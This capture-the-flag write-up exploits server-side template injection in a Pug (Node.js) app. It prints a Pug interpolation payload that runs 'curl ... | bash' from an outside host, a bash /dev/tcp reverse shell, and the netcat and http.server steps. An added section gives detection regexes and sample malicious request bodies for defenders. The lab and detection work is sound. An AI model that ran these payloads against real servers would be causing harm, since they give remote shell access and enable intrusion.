My favourite type of dog is a pug... and, you know what, Pug is my favourite templating engine too! I made this super slick application so you can play around with Pug and see how it works. Seriously, you can do so much with Pug!

Pug is a templating engine for Node.js that generates HTML. HackTricks covers it both for deserialization and for server-side template injection (SSTI). Given the room name, I went with SSTI first.

HackTricks provides an example payload that downloads and runs a shell script. It works because Pug's #{...} interpolation evaluates JavaScript when user-controlled text is compiled as part of the template: the code below reaches Node's module loader, requires child_process, and executes a command.

#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}
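From the defender's side, the ingredients of that payload are easy to recognise in request logs. The following is an added example (my own, not code from the write-up, from HackTricks or from the room's application): a small request-body triage check in JavaScript that flags Pug interpolation markers combined with reaches into Node's module loader or child_process. The sample bodies are constructed, and the host in the second one is a placeholder. The real fix for the application is never to compile user-supplied text as a Pug template; bind it as data to a fixed template instead, where #{} HTML-escapes the value.

```javascript
// Added example (not from the original write-up): request-body triage for
// Pug template injection attempts. Intended as a detection aid for logs or
// WAF-style filtering; it does not replace fixing the template-compilation bug.

const INDICATORS = [
  // "#{" or "!{" opens Pug interpolation
  { name: "pug-interpolation", re: /[#!]\{/ },
  // reaching the Node module loader from inside a template
  { name: "node-module-load", re: /mainModule|constructor\._load|require\(/ },
  // command-execution APIs
  { name: "child-process", re: /child_process|\.exec\(|\.spawn\(/ },
  // "curl ... | bash" style download-and-run
  { name: "pipe-to-shell", re: /\|\s*(ba)?sh\b/ },
];

// Returns the names of every indicator that matches the given request body.
function pugSstiIndicators(body) {
  return INDICATORS.filter((i) => i.re.test(body)).map((i) => i.name);
}

// A body that both opens Pug interpolation and touches the module loader or a
// process-execution API is treated as a likely attempt; interpolation alone is
// only flagged as suspicious, since "#{" can appear in harmless text.
function classify(body) {
  const hits = pugSstiIndicators(body);
  const interpolation = hits.includes("pug-interpolation");
  const execution =
    hits.includes("node-module-load") || hits.includes("child-process");
  let verdict = "benign";
  if (interpolation && execution) verdict = "likely-ssti";
  else if (interpolation) verdict = "suspicious";
  return { hits, verdict };
}

// Constructed sample bodies (not captured traffic). The second one has the
// shape of the public HackTricks payload quoted above, with a placeholder host.
const SAMPLES = [
  "name=Pug+the+dog",
  "name=#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad(\"child_process\").exec('curl ATTACKER-HOST:8000/s.sh | bash')}()}",
  "name=Price is #{5} dollars",
];

// Classify every sample and return the results for review or alerting.
function triageAll(samples = SAMPLES) {
  return samples.map((body) => ({ body, ...classify(body) }));
}

for (const r of triageAll()) {
  console.log(r.verdict.padEnd(12), r.hits.join(",") || "-", "|", r.body.slice(0, 60));
}
```

The "suspicious" tier exists to avoid burying analysts in false positives: a bare `#{` in a form field is worth a look but is not proof of anything, whereas interpolation plus `mainModule` or `child_process` in the same body has no legitimate reason to appear in user input.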

All we need to do is write a reverse shell script (s.sh) containing:

/bin/sh -i >& /dev/tcp/LOCAL-IP/4000 0>&1

Host it from the directory containing s.sh (http.server listens on port 8000 by default):

python3 -m http.server

Start a listener on port 4000:

nc -lnvp 4000

Send the payload, with LOCAL-IP replaced by the address of the listening machine:

#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl LOCAL-IP:8000/s.sh | bash')}()}

[image: shell]

Then read flag.txt:

[image: flag]